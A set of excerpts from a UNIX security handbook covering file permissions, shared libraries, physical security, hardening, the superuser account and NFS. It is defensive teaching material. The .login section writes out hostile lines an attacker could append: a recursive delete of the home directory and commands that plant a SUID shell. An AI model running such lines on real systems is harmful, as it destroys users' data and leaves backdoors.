The function drand48() is one of many functions which make up the System V random number generator. According to the Solaris documentation, the algorithm uses "the well-known linear congruential algorithm and 48-bit integer arithmetic." The function drand48() returns a double-precision number that is greater than or equal to 0.0 and less than 1.0, while the lrand48() and mrand48() functions return random numbers within a specified integer range. As with random(), these functions provide excellent random numbers for simulations and games, but should not be used for security-related applications such as picking cryptographic keys or simulating one-time pads; linear congruential algorithms are too easy to break.

23.7.4 Other random number generators

There are many other random number generators. Some of them are optimized for speed, while others are optimized for randomness. You can find a list of other random number generators in Bruce Schneier's excellent book, Applied Cryptography (John Wiley & Sons, Second Edition, 1995).

Some versions of the Linux operating system have carefully thought out random number generators in their kernel, accessible through the /dev/random and /dev/urandom devices. We think that this design is excellent - especially when the random number generators take into account additional system states, user inputs, and "random" external events to provide numbers that are "more" random.
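On a system that provides these devices, a quick way to pull a few random bytes for inspection (or to seed some other program) is:

% dd if=/dev/urandom bs=16 count=1 | od -x

Remember that /dev/random may block until the kernel has gathered enough environmental noise, while /dev/urandom returns immediately; neither device exists on systems whose kernels lack this feature.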



[Chapter 11] 11.6 Protecting Your System

Chapter 11
Protecting Against Programmed Threats

11.6 Protecting Your System

No matter what the threat is called, how it enters your system, or what the motives of the person(s) who wrote it may be, the potential for damage is your main concern. Any of these problems can result in downtime and lost or damaged resources. Understanding the nature of a threat is insufficient to prevent it from occurring.

At the same time, remember that you do not need many special precautions or special software to protect against programmed threats. The same simple, effective measures you would take to protect your system against unauthorized entry or malicious damage from insiders will also protect your system against these other threats.

11.6.1 File Protections

Files, directories, and devices that are writable (world-writable) by any user on the system can be dangerous security holes. An attacker who gains access to your system can gain even more access by modifying these files, directories, and devices. Maintaining a vigilant watch over your file protections protects against intrusion and also protects your system's legitimate users from each other's mistakes and antics. (Chapter 5 introduces file permissions and describes how you can change them.)

11.6.1.1 World-writable user files and directories

Many inexperienced users (and even careless experienced users) often make themselves vulnerable to attack by improperly setting the permissions on files in their home directories.

The .login file is a particularly vulnerable file. For example, if a user has a .login file that is world-writable, an attacker can modify the file to do his bidding. Suppose a malicious attacker inserts this line at the end of a user's .login file:

/bin/rm -rf ~

Whenever a user logs in, the C shell executes all of the commands in the .login file. A user whose .login file contains this nasty line will find all of his files deleted when he logs in!

Suppose the attacker appends these lines to the user's .login file:

/bin/cp /bin/sh /usr/tmp/.$USER
/bin/chmod 4755 /usr/tmp/.$USER

When the user logs in, the system creates a SUID shell in the /usr/tmp directory that will allow the attacker to assume the identity of the user at some point in the future.

In addition to .login, many other files pose security risks when they are world writable. For example, if an attacker modifies a world-writable .rhosts file, she can take over the user's account via the network.

In general, the home directories and the files in the home directories should have the permissions set so that they are only writable by the owner. Many files in the home directory, such as .rhosts, should only be readable by the owner as well. This practice will hinder an intruder in searching for other avenues of attack.
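A user (or an administrator walking through home directories) can close the most common of these holes with a couple of commands; adjust the list of dot files to the ones that actually exist in the account:

% chmod go-w ~ ~/.login ~/.cshrc ~/.profile
% chmod go-rwx ~/.rhosts ~/.netrc

The first command removes group and world write permission from the home directory and the startup files; the second makes the network access files readable and writable only by their owner.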

11.6.1.2 Writable system files and directories

There is also a risk when system files and directories are world writable. An attacker can replace system programs (such as /bin/ls) with new programs that do the attacker's bidding. This practice is discussed in Chapter 8, Defending Your Accounts.

NOTE: If you have a server that exports filesystems containing system programs (such as the /bin and /usr/bin directories), you may wish to export those filesystems read-only. Exporting a filesystem read-only renders the client unable to modify the files in that directory. To export a filesystem read-only, you must specify the read-only option in the server's export configuration. For example, on a System V (Solaris-style) server, to export the /bin and /usr/bin filesystems read-only, specify the following in your /etc/dfs/dfstab file:

share -F nfs -o ro=client /bin
share -F nfs -o ro=client /usr/bin

On a Berkeley-based system, place these lines in your /etc/exports file instead:

/bin -ro,access=client
/usr/bin -ro,access=client

Group-writable files

Sometimes, making a file group writable is almost as risky as making it world writable. If everybody on your system is a member of the group user, then making a file group-writable by the group user is the same as making the file world-writable.

You can use the find command to search for files that are group writable by a particular group, and to print a list of these files. For example, to search for all files that are writable by the group user, you might specify a command in the following form:

# find / -perm -020 -group user \! \( -type l -o -type p -o -type s \) -ls

If you have NFS, be sure to use the longer version of the command:

# find / \( -local -o -prune \) -perm -020 -group user \! \( -type l -o -type p -o -type s \) -ls

Often, files are made group writable so several people can work on the same project, and this may be appropriate in your system. However, some files, such as .cshrc and .profile, should never be made group writable. In many cases, this rule can be generalized to the following:

    Any file beginning with a period should not be world writable or group writable.

A more security-conscious site can further generalize this rule:

    Files that begin with a period should not be readable or writable by anyone other than the file's owner (that is, they should be mode 600).

Use the following form of the find command to search for all files beginning with a period in the /u filesystem that are either group writable or world writable:

# find /u \( -perm -2 -o -perm -20 \) -name .\* -ls

NOTE: As noted earlier, if you're using NFS, be sure to add the -local or -xdev option to each of the find commands above and run them on each of your servers, or use the fstype/prune options.

11.6.1.3 World-readable backup devices

Your tape drive should not be world readable. Otherwise, it allows any user to read the contents of any tape that happens to be in the tape drive. This scenario can be a significant problem for sites which do backups overnight, and then leave the tape in the drive until morning. During the hours that the tape is awaiting removal, any user can read the contents of any file on the tape.
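Checking and fixing this takes only a moment. The device names below are typical of BSD-derived systems and are only examples - substitute the tape devices your system actually uses:

# ls -l /dev/rst0 /dev/nrst0
# chmod 600 /dev/rst0 /dev/nrst0

Mode 600, with the devices owned by root (or by a dedicated operator account), lets the backup procedure use the drive while keeping curious users out.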

11.6.2 Shared Libraries

Programs that depend on shared libraries are vulnerable to a variety of attacks that involve switching the shared library that the program is running. If your system has dynamic libraries, they need to be protected to the same level as the most sensitive program on your system, because modifying those shared libraries can alter the operation of every program.

On some systems, additional shared libraries may be specified through the use of environment variables. While this is a useful feature on some occasions, the system's shared libraries should not be superseded for the following kinds of programs:

●   Programs executed by SUID programs
●   User shells
●   Network servers
●   Security services
●   Auditing and logging processes

On some versions of UNIX, you can disable shared libraries by statically linking the executable program. On others, you can limit whether alternate shared libraries are referenced by setting additional mode bits inside the executable image. We advise you to take these precautions when available.
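Two quick checks along these lines (the program names are only examples, and the exact commands differ between systems): the ldd command, where available, lists the shared libraries a binary will pull in, and a compiler flag such as GNU cc's -static builds a program with no shared-library dependencies at all:

% ldd /bin/login
% gcc -static -o mydaemon mydaemon.c

A statically linked binary ignores environment variables such as LD_LIBRARY_PATH, which is exactly the property you want for SUID programs and network servers.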



[Chapter 12] 12.4 Story: A Failed Site Inspection

Chapter 12
Physical Security

12.4 Story: A Failed Site Inspection

Catherine Aird, as quoted in the Quote of the Day mailing list (qotd-request@ensu.ucalgary.edu), wrote: "If...you can't be a good example, then you'll just have to be a horrible warning."

Recently, a consumer-products firm with world-wide operations invited one of the authors to a casual tour of one of the company's main sites. The site, located in an office park with several large buildings, included computers for product design and testing, nationwide management of inventory, sales, and customer support. It included a sophisticated, automated voice-response system costing thousands of dollars a month to operate; hundreds of users; and dozens of T1 (1.544 Mbits/sec) communications lines for the corporate network, carrying both voice and data communications.

The company thought that it had reasonable security - given the fact that it didn't have anything to lose. After all, the firm was in the consumer-products business. No government secrets or high-stakes stock and bond trading here.

12.4.1 What We Found ...

After our inspection, the company had some second thoughts about its security. Even without a formal site audit, the following items were discovered during our short visit.

12.4.1.1 Fire hazards

●   All of the company's terminal and network cables were suspended from hangers above false ceilings throughout the buildings. Although smoke detectors and sprinklers were located below the false ceiling, none were located above, where the cables were located. If there were a short or an electrical fire, it could spread throughout a substantial portion of the wiring plant and be very difficult, if not impossible, to control. No internal firestops had been built for the wiring channels, either.

●   Several of the fire extinguishers scattered throughout the building had no inspection tags, or were shown as being overdue for an inspection.

12.4.1.2 Potential for eavesdropping and data theft

●   Network taps throughout the buildings were live and unprotected. An attacker with a laptop computer could easily penetrate and monitor the network; alternatively, with a pair of scissors or wirecutters, an attacker could disable portions of the corporate network.

●   An attacker could get above the false ceiling through conference rooms, bathrooms, janitor's closets, and many other locations throughout the building, thereby gaining direct access to the company's network cables. A monitoring station (possibly equipped with a small radio transmitter) could be left in such a location for an extended period of time.

●   Many of the unused cubicles had machines that were not assigned to a particular user, but were nevertheless live on the network. An attacker could sit down at a machine, gain system privileges, and use that machine as a point for further attacks against the information infrastructure.

●   The company had no controls or policies on modems, thus allowing any user to set up a private SLIP or PPP connection to bypass the firewall.

●   Several important systems had their backup tapes unprotected, left on a nearby table or shelf.

12.4.1.3 Easy pickings

●   None of the equipment had any inventory-control stickers or permanent markings. If the equipment were stolen, it would not be recoverable.

●   There was no central inventory of equipment. If items were lost, stolen, or damaged, there was no way to determine the extent and nature of the loss.

●   Only one door to the building had an actual guard in place. People could enter and leave with equipment through other doors.

●   When we arrived outside a back door with our hands full, a helpful employee opened the door and held it for us without requesting ID or proof that we should be allowed inside.

●   Strangers walking about the building were not challenged. Employees did not wear tags and apparently made the assumption that anybody on the premises was authorized to be there.

12.4.1.4 Physical access to critical computers<br />

●<br />

●<br />

●<br />

Internal rooms with particularly sensitive equipment did not have locks on the doors.<br />

Although the main computer room was protected with a card key entry system, entry could be<br />

gained from an adjacent conference room or hallway under the raised floor.<br />

Many special-purpose systems were located in workrooms without locks on the doors. When users<br />

were not present, the machines were unmonitored and unprotected.<br />

12.4.1.5 Possibilities for sabotage<br />

●<br />

●<br />

The network between two buildings consisted of a bidirectional, fault-tolerant ring network. But<br />

the fault tolerance was compromised because both fibers were routed through the same,<br />

unprotected conduit.<br />

The conduit between two buildings could be accessed through an unlocked manhole in the parking<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_04.htm (2 of 3) [2002-04-12 10:45:34]


[Chapter 12] 12.4 Story: A Failed Site Inspection<br />

lot. An attacker located outside the buildings could easily shut down the entire network with heavy<br />

cable cutters or a small incendiary device.<br />

12.4.2 "Nothing to Lose?"<br />

Simply by walking through this company's base of operations, we discovered that this company would be<br />

an easy target for many attacks - both complicated and primitive. The attacker might be a corporate spy<br />

for a competing firm, or might simply be a disgruntled employee. Given the ease of stealing computer<br />

equipment, the company also had reason to fear less-than-honest employees. Without adequate inventory<br />

or other controls, the company might not be able to discover and prove any wide-scale fraud, nor would<br />

they be able to recover insurance in the event of any loss.<br />

Furthermore, despite the fact that the company thought that it had "nothing to lose," an internal estimate<br />

had put the cost of computer downtime at several million dollars per hour because of its use in<br />

customer-service management, order processing, and parts management. An employee, out for revenge<br />

or personal gain, could easily put a serious dent into this company's bottom line with a small expenditure<br />

of effort, and little chance of being caught.<br />

Indeed, the company had a lot to lose.<br />

What about your site?<br />


Chapter 13
Personnel Security

13.3 Outsiders

Visitors, maintenance personnel, contractors, vendors, and others may all have temporary access to your location and to your systems. They are people too, and could be a part of that 100% pool we mentioned at the beginning of this chapter. You should consider how everything we discussed earlier can be applied to these people with temporary access. At the very least, no one from the outside should be allowed unrestricted physical access to your computer and network equipment.


Chapter 6
Cryptography

6.3 The Enigma Encryption System

To understand how some modern encryption programs work, consider the raison d'être for the birth of computers in the first place: the Enigma encryption device, used by the Germans during the Second World War. A photograph of an Enigma encryption device appears in Figure 6.2.

Figure 6.2: An Enigma machine (photo courtesy Smithsonian Institution)

Enigma was developed in the early 1900s in Germany by Arthur Scherbius and used throughout World War II. The Enigma encryption machine, illustrated in the photo, consisted of a battery, a push-button for every letter of the alphabet, a light for every letter of the alphabet, and a set of turnable discs called rotors. The Enigma machine was similar to a child's toy: pressing a button lit a different light. If you turned one of the rotors, the correspondence between buttons and lights changed.

The rotors were crucial to the machine's cryptographic abilities. Each rotor on the Enigma machine was<br />

similar to a sandwich, with 52 metal contacts on each side. Inside the rotors, shown schematically in<br />

Figure 6.3, were 52 wires, each wire connecting a pair of contacts, one on either side of the rotor. Instead<br />

of directly connecting the contacts on one side with those on the other side, the wires scrambled the<br />

order, so that, for example, contact #1 on the left might be connected with contact #15 on the right, and<br />

so on.<br />

Figure 6.3: Diagram of an Enigma rotor<br />

Enigma placed three of these rotors side by side. At the end of the row of rotors was a reflector, which<br />

sent the electrical signal back through the machine for a second pass. (Four rotors were used near the end<br />

of the war.) Half of the 52 contacts were connected with a push-button and the battery; the other half<br />

were connected with the lights. Each button closed a circuit, causing a light to brighten; however,<br />

precisely which light brightened depended on the positioning of the three rotors and the reflector.<br />

To encrypt or decrypt a message, a German code clerk would set the rotors to a specific starting<br />

position - the key. For each letter, the code clerk would then press the button, write down which letter lit,<br />

and then advance the rotors. Because the rotors were advanced after every letter, the same letter<br />

appearing twice in the plaintext would usually be encrypted to two different letters in the ciphertext.<br />

Enigma was thus a substitution cipher with a different set of substitutions for each letter in the message;<br />

these kinds of ciphers are called polyalphabetic ciphers. The letter Z was used to represent a space;<br />

numbers were spelled out. Breaking an encrypted message without knowing the starting rotor position<br />

was a much more difficult task.<br />


Chapter 17
TCP/IP Services

17.4 Security Implications of Network Services

Network servers are the portals through which the outside world accesses the information stored on your computer. Every server must:

● Determine what information or action the client requests.

● Decide whether or not the client is entitled to the information, optionally authenticating the person (or program) on the other side of the network that is requesting service.

● Transfer the requested information or perform the desired service.

By their design, many servers must run with root privileges. A bug or an intentional back door built into a server can therefore compromise the security of an entire computer, opening the system to any user of the network who is aware of the flaw. Even a relatively innocuous program can be the downfall of an entire computer. Flaws may remain in programs distributed by vendors for many years, only to be uncovered some time in the future.

Furthermore, many UNIX network servers rely on IP numbers or hostnames to authenticate incoming network connections. This approach is fundamentally flawed, as neither the IP protocol nor DNS was designed to be resistant to attack. There have been many reports of computers that have fallen victim to successful IP spoofing attacks or DNS compromise.

Given these factors, you may wish to adopt one or more of the following strategies to protect your servers and data:

● Use encryption to protect your data. If it is stolen, the data will do your attacker no good. Furthermore, it will be difficult, if not impossible, for an attacker to make alterations to your data that you will not notice.

● Avoid using passwords and host-based authentication. Instead, rely on tokens, one-time passwords, or cryptographically secure communications.

● Use a firewall to isolate your internal network from the outside world.

● Disconnect your internal network from the outside world. You can still relay electronic mail between the two networks using UUCP or some other mechanism. Set up separate network workstations to allow people to access the WWW or other Internet services.

● Create a second internal network for the most confidential information.

Bringing Up an Internet Server Machine: Step-by-Step

Although every site is unique, you may find the following step-by-step list helpful in bringing up new servers as securely as possible:

1. Don't physically connect to the network before you perform all of the following steps. Because some network access may be needed to FTP patches, for example, you may need to connect as briefly as possible in single-user mode (so there are no daemons running), fetch what you need, disconnect physically, and then follow steps 2-12.

2. Erase your computer's hard disk and load a fresh copy of your operating system.

3. Locate and load all security-related patches. To find the patches, check with both your vendor and with CERT's FTP server, ftp.cert.org.

4. Modify your computer's /etc/syslog.conf file so that logs are stored both locally and on your organization's logging host.

5. Configure as few user accounts as necessary. Ideally, users should avoid logging into your Internet server.

6. If your server is a mail server, then you may wish to have your users read their mail with POP. You will need to create user accounts, but give each user a /bin/nologin (or a shell script that simply prints a "no logins allowed" message) as their shell to prevent logins.

7. Check all /etc/rc* and other system initialization files, and remove daemons you don't want running. (Use netstat to see what services are running.)

8. Look through /etc/inetd.conf and disable all unneeded services. Protect the remaining services with tcpwrapper or a similar program. (A minimal sketch of steps 4 and 8 appears after this list.)

9. Add your own server programs to the system. Make sure that each one is based on the most up-to-date code.

10. Get and install Tripwire, so you can tell if any files have been modified as the result of a compromise. (See Chapter 9, Integrity Management, for details.)

11. Get and run Tiger to look for other problems.

12. Monitor your system. Make sure that log files aren't growing out of control. Use the last command to see if people have logged in. Be curious.

● Disable all services that you are not sure you need, and put wrappers around the rest to log connections and restrict connectivity.
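To make steps 4 and 8 concrete, here is a minimal sketch of the two configuration files involved. The host name loghost, the log file path, and the network prefix 192.168.1. are placeholders for your own site, and the exact selector syntax for syslog.conf varies somewhat between vendors; check your syslogd and tcpd documentation.

# /etc/syslog.conf (step 4): keep a local copy of the logs and send a
# second copy to your organization's logging host. On many systems the
# two fields must be separated by tabs, not spaces.
*.info        /var/adm/messages
*.info        @loghost

# /etc/hosts.deny (step 8): with tcpd (the tcpwrapper program), refuse
# every wrapped service by default ...
ALL: ALL

# /etc/hosts.allow: ... then allow only the services you need, and only
# from your own network.
in.telnetd, in.ftpd: 192.168.1.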


Chapter 4
Users, Groups, and the Superuser

4.2 Special Usernames

In addition to regular users, UNIX comes with a number of special users that exist for administrative and accounting purposes. We've already mentioned some of these users. The most important of them is root, the superuser.

4.2.1 The Superuser

Every UNIX system comes with a special user in the /etc/passwd file with a UID of 0. This user is known as the superuser and is normally given the username root. The password for the root account is usually called simply the "root password."

The root account is the identity used by the operating system itself to accomplish its basic functions, such as logging users in and out of the system, recording accounting information, and managing input/output devices. For this reason, the superuser exerts nearly complete control over the operating system: nearly all security restrictions are bypassed for any program that is run by the root user, and most of the checks and warnings are turned off.

4.2.1.1 Any username can be the superuser

As we noted in Section 4.1, "Users and Groups," earlier in this chapter, any account which has a UID of 0 has superuser privileges. The username root is merely a convention. Thus, in the following sample /etc/passwd file, both root and beth can execute commands without any security checks:

root:zPDeHbougaPpA:0:1:Operator:/:/bin/ksh
beth:58FJ32JK.fj3j:0:101:Beth Cousineau:/u/beth:/bin/csh
rachel:eH5/.mj7NB3dx:181:100:Rachel Cohen:/u/rachel:/bin/ksh

You should immediately be suspicious of accounts on your system which have a UID of 0 that you did not install; accounts such as these are frequently added by people who break into computers so that they will have a simple way of obtaining superuser access in the future.
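One quick way to check for such accounts is to scan the password file for every entry with a UID of 0, along the lines of the following sketch. (If your site uses NIS or a shadow password file, remember to check those sources of account information as well.)

# Print the username of every account whose UID field is 0.
# Anything other than root - or a UID-0 account you installed yourself -
# deserves immediate investigation.
awk -F: '$3 == 0 {print $1}' /etc/passwd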


4.2.1.2 Superuser is not for casual use

The root account is not an account designed for the personal use of the system administrator. Because all security checks are turned off for the superuser, a typing error could easily trash the entire system.

The UNIX system administrator will frequently have to become the superuser to perform various system administration tasks. This change in status can be completed using the su command (discussed later in this chapter) to spawn a privileged shell. Extreme caution must be exercised when operating with superuser capabilities. When the need for superuser access has ended, the system administrator should exit from the privileged shell.

NOTE: Many versions of UNIX allow you to configure certain terminals so that users can't log in as the superuser from the login: prompt. Anyone who wishes to have superuser privileges must first log in as himself or herself and then su to root. This feature makes tracking who is using the root account easier, because the su command logs the username of the person who runs it and the time that it was run.[7] The feature also adds to overall system security, because people will need to know two passwords to gain superuser access to your system.

In general, most UNIX systems today are configured so that the superuser can log in with the root account on the system console, but not on other terminals. We describe this technique in Section 4.3.6, "Restricting su," later in this chapter.

Even if your system allows users to log directly into the root account, we recommend that you institute rules that require users to first log into their own accounts and then use the su command.
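The mechanism for restricting where root may log in is vendor-specific; the lines below are only a sketch of two common forms. On BSD-derived systems, the "secure" keyword in /etc/ttys marks the terminals on which direct root logins are accepted; on many System V-derived systems (Solaris, for example), the CONSOLE setting in /etc/default/login plays a similar role.

# BSD-style /etc/ttys: only the console is marked "secure," so root may
# log in there but not on other terminals or network pseudo-ttys.
console "/usr/libexec/getty std.9600"   vt100   on secure
ttyp0   none                            network off

# System V-style /etc/default/login: if CONSOLE is set, direct root
# logins are accepted only on that device; everyone else must use su.
CONSOLE=/dev/console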

4.2.1.3 What the superuser can do

Any process that has an effective UID of 0 (see "Real and Effective User IDs" later in this chapter) runs as the superuser - that is, any process with a UID of 0 runs without security checks and is allowed to do almost anything. Normal security checks and constraints are ignored for the superuser, although most systems do audit and log some of the superuser's actions.

Some of the things that the superuser can do include:

Process Control:

● Change the nice value of any process (see the section "Process priority and niceness" in Appendix C, UNIX Processes).

● Send any signal to any process (see "Signals" in Appendix C).

● Alter "hard limits" for maximum CPU time as well as maximum file, data segment, stack segment, and core file sizes (see Chapter 11, Protecting Against Programmed Threats).

● Turn accounting on and off (see Chapter 10).

● Bypass login restrictions prior to shutdown. (Note: this may not be possible if you have configured your system so that the superuser cannot log into terminals.)

● Change his or her process UID to that of any other user on the system.

● Log out all users and shut down or reboot the system.

Device Control:

● Access any working device.

● Shut down the computer.

● Set the date and time.

● Read or modify any memory location.

● Create new devices (anywhere in the filesystem) with the mknod command.

Network Control:

● Run network services on "trusted" ports (see Chapter 17, TCP/IP Services).

● Reconfigure the network.

● Put the network interface into "promiscuous mode" and examine all packets on the network (possible only with some kinds of network interfaces).

Filesystem Control:

● Read, modify, or delete any file or program on the system (see Chapter 5, The UNIX Filesystem).

● Run any program.[8]

[8] If a program has a file mode of 000, root must set the execute bit of the program with the chmod() system call before the program can be run, although shell scripts can be run by feeding their input directly into /bin/sh.

● Change a disk's electronic label.[9]

[9] Usually stored on the first 16 blocks of a hard disk or floppy disk formatted with the UNIX filesystem.

● Mount and unmount filesystems.

● Add, remove, or change user accounts.

● Enable or disable quotas and accounting.

● Use the chroot() system call, which changes a process's view of the filesystem root directory.

● Write to the disk after it is "100 percent" full. (The Berkeley Fast Filesystem and the Linux ext2 File System both allow the reservation of some minfree amount of the disk. Normally, a report that a disk is 100% full implies that there is still 10% left. Although this space can be used by the superuser, it shouldn't be: filesystems run faster when their disks are not completely filled.)


4.2.1.4 What the superuser can't do

Despite all of the powers listed above, there are some things that the superuser can't do, including:

● Make a change to a filesystem that is mounted read-only. (However, the superuser can make changes directly to the raw device, or unmount a read-only filesystem and remount it read/write, provided that the media is not physically write-protected.)

● Unmount a filesystem which contains open files, or in which some running process has set its current directory.[10]

[10] Many BSD variants (including NetBSD and FreeBSD) provide an -f option to umount, which forcibly unmounts a busy filesystem.

● Write directly to a directory, or create a hard link to a directory (although these operations are allowed on some UNIX systems).

● Decrypt the passwords stored in the /etc/passwd file, although the superuser can modify the /bin/login and su system programs to record passwords when they are typed. The superuser can also use the passwd command to change the password of any account.

● Terminate a process that has entered a wait state inside the kernel, although the superuser can shut down the computer, effectively killing all processes.

4.2.1.5 The problem with the superuser

The superuser is the main security weakness in the UNIX operating system. Because the superuser can do anything, after a person gains superuser privileges - for example, by learning the root password and logging in as root - that person can do virtually anything to the system. This explains why most attackers who break into UNIX systems try to become superusers.

Most UNIX security holes that have been discovered are of the kind that allow regular users to obtain superuser privileges. Thus, most UNIX security holes result in a catastrophic bypass of the operating system's security mechanisms. After a flaw is discovered and exploited, the entire computer is compromised.

There are a number of techniques for minimizing the impact of such system compromises, including:

● Store your files on removable media, so that an attacker who gains superuser privileges will still not have access to critical files.

● Encrypt your files. Being the superuser grants privileges only on the UNIX system; it does not magically grant the mathematical prowess necessary to decrypt a well-coded file or the necessary clairvoyance to divine encryption keys. (Encryption is discussed in Chapter 6, Cryptography.)

● Mount disks read-only when possible. (An example appears below.)

● Keep your backups of the system current. This practice is discussed further in Chapter 7, Backups.

There are many other defenses, too, and we'll continue to present them throughout this book.
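Returning to the read-only mounting technique mentioned above: a partition that holds only programs can often be mounted read-only with a command along these lines. The device name and mount point here are placeholders, and option spellings vary slightly between systems.

# Mount /usr read-only. An attacker who gains superuser privileges
# cannot modify the programs on it without first remounting it
# read/write - an extra, and often noticeable, step.
/etc/mount -o ro /dev/sd0g /usr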


Other operating systems - including Multics - obviate the superuser flaw by compartmentalizing the many system privileges which UNIX bestows on the root user. Indeed, attempts to design a "secure" UNIX (one that meets U.S. Government definitions of highly trusted systems) have adopted this same strategy of dividing superuser privileges into many different categories.

Unfortunately, attempts at compartmentalization often fail. For example, Digital's VAX/VMS operating system divides system privileges into many different classifications. But many of these privileges can be used by a persistent person to establish the others: an attacker who achieves "physical I/O access" can modify the operating system's database to grant himself any other privilege that he desires. Thus, instead of a single catastrophic failure in security, we have a cascading series of smaller failures leading to the same end result. For compartmentalization to be successful, it must be carefully thought out.

4.2.2 Other Special Users

To minimize the danger of superuser penetration, many UNIX systems use other special user accounts to execute system functions that require special privileges - for example, to access certain files or directories - but that do not require superuser privileges. These special users are associated with particular system functions, rather than individual users.

One very common special user is the uucp user, which is used by the UUCP system for transferring files and electronic mail between UNIX computers connected by telephone. When one computer dials another computer, it must first log in: instead of logging in as root, the remote computer logs in as uucp. Electronic mail that's awaiting transmission to the remote machine is stored in directories that are readable only by the uucp user so that other users on the computer can't access each other's personal mail. (See Chapter 15.)

Other common special users include daemon, which is often used for network utilities; bin and sys, which are used for system files; and lp, which is used for the line printer system.
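On a typical system, these special users appear in /etc/passwd with their own UIDs, a locked password field, and (for most of them) no interactive login shell. The entries below are only illustrative; the UIDs, comment fields, and home directories vary from vendor to vendor:

# Illustrative special-user entries (details vary between systems):
daemon:*:1:1:System daemons:/:
bin:*:3:7:Owner of system files:/bin:
uucp:*:4:8:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/lib/uucp/uucico
lp:*:71:8:Line printer daemon:/usr/spool/lp: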

4.2.3 Impact of the /etc/passwd and /etc/group Files on Security

From the point of view of system security, /etc/passwd is one of the UNIX operating system's most important files. (Another very important file is /dev/kmem, which, if left unprotected, can be used to read or write any address in the kernel's memory.) If you can alter the contents of /etc/passwd, you can change the password of any user or make yourself the superuser by changing your UID to 0.

The /etc/group file is also very important. If you can change the /etc/group file, you can add yourself to any group that you wish. Often, by adding yourself to the correct group, you can eventually gain access to the /etc/passwd file, and thus achieve all superuser privileges.
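A quick sanity check is to confirm that these files are owned by root and are not writable by anyone else. The command and the sample output below are a sketch; the owner, group, sizes, and dates on your system will differ, but the permission bits should look much the same:

# /etc/passwd and /etc/group must be world-readable but writable only by
# root; /dev/kmem should not be readable or writable by ordinary users.
ls -l /etc/passwd /etc/group /dev/kmem

# Typical safe output:
# -rw-r--r--  1 root  wheel   1297 Apr 12 09:14 /etc/passwd
# -rw-r--r--  1 root  wheel    384 Apr 12 09:14 /etc/group
# crw-r-----  1 root  kmem    3, 1 Apr 12 09:14 /dev/kmem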


Chapter 20
NFS

Contents:
Understanding NFS
Server-Side NFS Security
Client-Side NFS Security
Improving NFS Security
Some Last Comments

In many environments, we want to share files and programs among many workstations in a local area<br />

network. Doing so requires programs that let us share the files, create new files, do file locking, and<br />

manage ownership correctly. Over the last dozen years there have been a number of network-capable<br />

filesystems developed by commercial firms and research groups. These have included Apollo Domain,<br />

the Andrew Filesystem (AFS), the AT&T Remote Filesystem (RFS), and Sun Microsystems' Network<br />

Filesystem (NFS). Each of these has had beneficial features and limiting drawbacks.<br />

Of all the network filesystems, NFS is probably the most widely used. NFS is available on almost all<br />

versions of <strong>UNIX</strong>, as well as on Apple Macintosh systems, MS-DOS, Windows, OS/2, and VMS. NFS<br />

has continued to mature, and we expect that Version 3 of NFS will help to perpetuate and expand its<br />

reach. For this reason, we will focus in this book on the security implications of running NFS on your<br />

<strong>UNIX</strong> systems. If you use one of the other forms of network filesystems, there are associated security<br />

considerations, many of which are similar to the ones we present here: be sure to consult your vendor<br />

documentation.<br />

20.1 Understanding NFS

Using NFS, clients can mount partitions of a server as if they were physically connected to the client. In addition to simply allowing remote access to files over the network, NFS allows many (relatively) low-cost computer systems to share the same high-capacity disk drive at the same time. NFS server programs have been written for many different operating systems, which let users on UNIX workstations have remote access to files stored on a variety of different platforms. NFS clients have been written for microcomputers such as the IBM/PC and Apple Macintosh, giving PC users much of the same flexibility enjoyed by their UNIX coworkers, as well as a relatively easy method of data interchange.

NFS is nearly transparent. In practice, a workstation user simply logs into the workstation and begins working, accessing it as if the files were locally stored. In many environments, workstations are set up to mount the disks on the server automatically at boot time or when files on the disk are first referenced. NFS also has a network mounting program that can be configured to mount the NFS disk automatically when an attempt is made to access files stored on remote disks.

There are several basic security problems with NFS:

● NFS is built on top of Sun's RPC (Remote Procedure Call), and in most cases uses RPC for user authentication. Unless a secure form of RPC is used, NFS can be easily spoofed.

● Even when Secure RPC is used, information sent by NFS over the network is not encrypted, and is thus subject to monitoring and eavesdropping. As we mention elsewhere, the data can be intercepted and replaced (thereby corrupting or Trojaning files being imported via NFS).

● NFS uses the standard UNIX filesystem for access control, opening the networked filesystem to many of the same problems as a local filesystem.

One of the key design features behind NFS is the concept of server statelessness. Unlike several other<br />

systems, there is no "state" kept on a server to indicate that a client is performing a remote file operation.<br />

Thus, if the client crashes and is rebooted, there is no state in the server that needs to be recovered.<br />

Alternatively, if the server crashes and is rebooted, the client can continue operating on the remote file as<br />

if nothing really happened - there is no server-side state to recreate.[1] We'll discuss this concept further<br />

in later sections.<br />

[1] Actual implementations are not completely stateless, however, as we will see later in this<br />

chapter.<br />

20.1.1 NFS History

NFS was developed inside Sun Microsystems in the early 1980s. Since that time, NFS has undergone three major revisions:

NFS Version 1
NFS Version 1 was Sun's prototype network filesystem. This version was never released to the outside world.

NFS Version 2
NFS Version 2 was first distributed with Sun's SunOS 2 operating system in 1985. Version 2 was widely licensed to numerous UNIX workstation vendors. A freely distributable, compatible version was developed in the late 1980s at the University of California at Berkeley.

During its 10-year life, many subtle, undocumented changes were made to the NFS version 2 specification. Some vendors allowed NFS version 2 to read or write more than 4K bytes at a time; others increased the number of groups provided as part of the RPC authentication from 8 to 16. Although these minor changes created occasional incompatibilities between different NFS implementations, NFS version 2 provided a remarkable degree of compatibility between systems made by different vendors.

NFS Version 3
The NFS Version 3 specification was developed during a series of meetings in Boston in July, 1992.[2] Working code for NFS Version 3 was introduced by some vendors in 1995, and is expected to be widely available in 1996. Version 3 incorporates many performance improvements over Version 2, but does not significantly change the way that NFS works or the security model used by the network filesystem.

[2] Pawlowski, Juszczak, Staubach, Smith, Lebel and Hitz, "NFS Version 3 Design and Implementation," USENIX Summer 1994 conference. The standard was later codified as RFC 1813. A copy of the NFS Version 3 paper can be obtained from http://www.netapp.com/Docs/TechnicalDocs/nfs_version_3.html. The RFC can be downloaded from http://ds.internic.net/rfc/rfc1813.txt.

NFS is based on two similar but distinct protocols: MOUNT and NFS. Both make use of a data object<br />

known as a file handle. There is also a distributed protocol for file locking, which is not technically part<br />

of NFS, and which does not have any obvious security ramifications (other than those related to potential<br />

denial of service attacks for its users), so we won't describe the file locking protocol here.<br />

20.1.2 File Handles<br />

Each object on the NFS-mounted filesystem is referenced by a unique object called a file handle. A file<br />

handle is viewed by the client as being opaque - the client cannot interpret the contents. However, to the<br />

server, the contents have considerable meaning. The file handles uniquely identify every file and<br />

directory on the server computer.<br />

